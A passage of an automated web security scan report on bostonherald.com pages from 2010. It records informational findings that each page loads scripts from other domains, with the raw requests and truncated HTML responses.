Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/srvc=home&position=4 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.176. http://bostonherald.com/sports/golf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/golf/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id=

Request

GET /sports/golf/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 71542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id="></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.177. http://bostonherald.com/sports/high_school/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/high_school/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sports/high_school/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.178. http://bostonherald.com/sports/hockey/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/hockey/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlministandings.aspx?id=121
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlschedule.aspx?id=121
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlteamleaders.aspx?id=121

Request

GET /sports/hockey/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:57:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlschedule.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlministandings.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlteamleaders.aspx?id=121"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.179. http://bostonherald.com/sports/other_sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/other_sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /sports/other_sports/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:10:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.180. http://bostonherald.com/sports/soccer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/soccer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /sports/soccer/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:02:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.181. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://www.google-analytics.com/urchin.js

Request

Response

9.182. http://bostonherald.com/track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /track/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

